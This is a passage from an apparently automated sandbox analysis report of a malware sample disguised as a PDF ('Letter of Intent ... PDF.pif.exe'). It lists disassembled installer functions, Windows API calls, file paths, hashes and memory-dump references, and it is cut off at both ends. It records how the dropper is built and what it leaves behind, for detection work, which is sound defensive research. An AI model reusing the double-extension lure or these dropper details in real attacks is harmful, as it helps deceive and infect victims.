                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend
                                                                                      • String ID:
                                                                                      • API String ID: 3850602802-0
                                                                                      • Opcode ID: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                                      • Instruction ID: 691050d084ac05b3cc339cea154a0297f3c15b89657cbedd253a0759ece72884
                                                                                      • Opcode Fuzzy Hash: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                                      • Instruction Fuzzy Hash: 23B01236181A00BFDF114B10EE0AF857E62F7AC701F018438B340240F0CBF200A0DB08
                                                                                      Function 00403192 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC6,?,?,?,?,00000000,004033FE,?), ref: 004031A0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FilePointer
                                                                                      • String ID:
                                                                                      • API String ID: 973152223-0
                                                                                      • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                      • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                      • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                      • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                      Function 00403FB7 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • KiUserCallbackDispatcher.NTDLL(?,00403D8F), ref: 00403FC1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CallbackDispatcherUser
                                                                                      • String ID:
                                                                                      • API String ID: 2492992576-0
                                                                                      • Opcode ID: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                                      • Instruction ID: d41632a2b0a6fb41d9385d651c54052ae940fbff5a4ac867539882f0f930e1f3
                                                                                      • Opcode Fuzzy Hash: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                                      • Instruction Fuzzy Hash: 92A01132800200EFCE0A8B80EF0AC0ABB22BBA0300B008038A280800308A320830EB08
                                                                                      Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 17sleepCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: Sleep
                                                                                      • String ID:
                                                                                      • API String ID: 3472027048-0
                                                                                      • Opcode ID: 0cba12757f4b9dbe4b1b29c801d0aac46149800dbc725911c071643de25804c9
                                                                                      • Instruction ID: 400ce7b91063bccb4178982caa56b056fda0151955185afa3a67df28135fc941
                                                                                      • Opcode Fuzzy Hash: 0cba12757f4b9dbe4b1b29c801d0aac46149800dbc725911c071643de25804c9
                                                                                      • Instruction Fuzzy Hash: A8D0127B714100CBD750EBB8AF8985F73A8E79132A3254837D952F20D2D578C842863C

                                                                                      Non-executed Functions

                                                                                      Function 00404976 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003F9), ref: 0040498E
                                                                                      • GetDlgItem.USER32(?,00000408), ref: 00404999
                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 004049E3
                                                                                      • LoadBitmapW.USER32(0000006E), ref: 004049F6
                                                                                      • SetWindowLongW.USER32(?,000000FC,00404F6E), ref: 00404A0F
                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A23
                                                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A35
                                                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 00404A4B
                                                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A57
                                                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A69
                                                                                      • DeleteObject.GDI32(00000000), ref: 00404A6C
                                                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404A97
                                                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AA3
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B39
                                                                                      • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404B64
                                                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B78
                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00404BA7
                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BB5
                                                                                      • ShowWindow.USER32(?,00000005), ref: 00404BC6
                                                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CC3
                                                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
                                                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
                                                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
                                                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D81
                                                                                      • ImageList_Destroy.COMCTL32(?), ref: 00404D96
                                                                                      • GlobalFree.KERNEL32(?), ref: 00404DA6
                                                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1F
                                                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 00404EC8
                                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED7
                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF7
                                                                                      • ShowWindow.USER32(?,00000000), ref: 00404F45
                                                                                      • GetDlgItem.USER32(?,000003FE), ref: 00404F50
                                                                                      • ShowWindow.USER32(00000000), ref: 00404F57
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                      • String ID: $M$N
                                                                                      • API String ID: 1638840714-813528018
                                                                                      • Opcode ID: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                                                      • Instruction ID: 6d1688c8488b8f7448caaf142d0c57913a8900a758ff6f7bd5d79a6fae369404
                                                                                      • Opcode Fuzzy Hash: 4bb4fbd11d964890b5e614a02caf67fc8325d7349ebfcc355399b97648a18b79
                                                                                      • Instruction Fuzzy Hash: 05026DB0900209EFEB149F54DD45AAE7BB9FB84314F14813AE610BA2E1C7B99D51CF58
                                                                                      Function 00404430 Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 269stringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,000003FB), ref: 0040447F
                                                                                      • SetWindowTextW.USER32(00000000,?), ref: 004044A9
                                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0040455A
                                                                                      • CoTaskMemFree.OLE32(00000000), ref: 00404565
                                                                                      • lstrcmpiW.KERNEL32(Call,0042D1F8,00000000,?,?), ref: 00404597
                                                                                      • lstrcatW.KERNEL32(?,Call), ref: 004045A3
                                                                                      • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004045B5
                                                                                        • Part of subcall function 0040550D: GetDlgItemTextW.USER32(?,?,00000400,004045EC), ref: 00405520
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                        • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                        • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                      • GetDiskFreeSpaceW.KERNEL32(0042B1C8,?,?,0000040F,?,0042B1C8,0042B1C8,?,00000000,0042B1C8,?,?,000003FB,?), ref: 00404676
                                                                                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404691
                                                                                      • SetDlgItemTextW.USER32(00000000,00000400,0042B1B8), ref: 00404717
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                      • String ID: $@d$A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\siphonophoran\Arveafgifternes\wright$Call
                                                                                      • API String ID: 2246997448-2460974281
                                                                                      • Opcode ID: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                                                      • Instruction ID: bd47b41a7abdf1344e554ed8777e7d92ff40a9b1da15b07d15b44e24a67a1b52
                                                                                      • Opcode Fuzzy Hash: d261c670d50ba5bee67266af79b7bfed0b56d12dbf2e2e6faf1bb8e2e83b33c7
                                                                                      • Instruction Fuzzy Hash: 4E9183B1900209ABDB11AFA1CD85AAF77B8EF85314F10843BF601B72D1D77C8A41CB69
                                                                                      Function 00402706 Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 00402715
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: FileFindFirst
                                                                                      • String ID:
                                                                                      • API String ID: 1974802433-0
                                                                                      • Opcode ID: f1f402ef0e705e307558f261dfe267dd3502fab154966cf0cee0880d27ec8a01
                                                                                      • Instruction ID: 7be6c913c08d15ea884a43ce55a76abbcb29d6a56581a49c1298855279991998
                                                                                      • Opcode Fuzzy Hash: f1f402ef0e705e307558f261dfe267dd3502fab154966cf0cee0880d27ec8a01
                                                                                      • Instruction Fuzzy Hash: 19F05E75A001159BDB00EBA4DA499AEB378EF05324F60417BE516E31D1DBB44A41DB29
                                                                                      Function 004064EC Relevance: .3, Instructions: 334COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                                      • Instruction ID: 531fec7b0fb0d211cf15be9fd3757e070872b4d27e2d3c8a48bb83720311cc85
                                                                                      • Opcode Fuzzy Hash: d398b535e43ee880de6f9663a3da9d30c23bf20106ab7c53179b5f9c0eb57cb5
                                                                                      • Instruction Fuzzy Hash: 01E19A71900705DFCB24CF98C890BAAB7F5FB44305F15882EE897A7291D778AAA1CF44
                                                                                      Function 00404132 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 207windowstringCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004041D0
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004041E4
                                                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404201
                                                                                      • GetSysColor.USER32(?), ref: 00404212
                                                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404220
                                                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040422E
                                                                                      • lstrlenW.KERNEL32(?), ref: 00404233
                                                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404240
                                                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404255
                                                                                      • GetDlgItem.USER32(?,0000040A), ref: 004042AE
                                                                                      • SendMessageW.USER32(00000000), ref: 004042B5
                                                                                      • GetDlgItem.USER32(?,000003E8), ref: 004042E0
                                                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404323
                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404331
                                                                                      • SetCursor.USER32(00000000), ref: 00404334
                                                                                      • ShellExecuteW.SHELL32(0000070B,open,@.C,00000000,00000000,00000001), ref: 00404349
                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00404355
                                                                                      • SetCursor.USER32(00000000), ref: 00404358
                                                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404387
                                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404399
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                      • String ID: $@d$@.C$N$open
                                                                                      • API String ID: 3615053054-1772195069
                                                                                      • Opcode ID: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                                                      • Instruction ID: 99db4efdefbfae6e02fe30a975520441482abf578fd64f5d263331c8f1dab2c3
                                                                                      • Opcode Fuzzy Hash: 189af6bbec081a76bdebae2a70f4f566850949fa3ab236cd5487776f7d1f3ede
                                                                                      • Instruction Fuzzy Hash: 517181B1A00209FFDB119F60DD85AAA7B79FF84355F04803AFA05B61E0C778A951CF98
                                                                                      Function 00405A52 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 141filestringmemoryCOMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • lstrcpyW.KERNEL32(00430898,NUL,?,00000000,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A62
                                                                                      • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405C08,?,?,00000001,0040579D,?,00000000,000000F1,?), ref: 00405A86
                                                                                      • GetShortPathNameW.KERNEL32(00000000,00430898,00000400), ref: 00405A8F
                                                                                        • Part of subcall function 00405934: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00405B51,00000000,[Rename]), ref: 00405944
                                                                                        • Part of subcall function 00405934: lstrlenA.KERNEL32(?,?,00000000,00405B51,00000000,[Rename]), ref: 00405976
                                                                                      • GetShortPathNameW.KERNEL32(?,00431098,00000400), ref: 00405AAC
                                                                                      • wsprintfA.USER32 ref: 00405ACA
                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00431098,C0000000,00000004,00431098,?,?,?,?,?), ref: 00405B05
                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405B14
                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405B2E
                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00405B5E
                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00430498,00000000,-0000000A,0040A514,00000000,[Rename]), ref: 00405BB4
                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00405BC6
                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405BCD
                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405BD4
                                                                                        • Part of subcall function 004059CF: GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                        • Part of subcall function 004059CF: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.1949189420.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.1949170682.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949208370.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949228764.0000000000459000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.1949388962.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                                      • API String ID: 3756836283-899692902
                                                                                      • Opcode ID: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                                                      • Instruction ID: 2fe29930d4e79bd0ae977f5d9eb33e4478da98161fe3751d0f08acbad4e80cd6
                                                                                      • Opcode Fuzzy Hash: f1fbf85e8721b65103666638b9a004b4b43e3e5a3ddcd2c3c3fa491cf2af1882
                                                                                      • Instruction Fuzzy Hash: 0C410471200B05BFD2206B219D49F6B3AACEF85715F14043AF941F62D2EA7CF8018A7D
                                                                                      Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
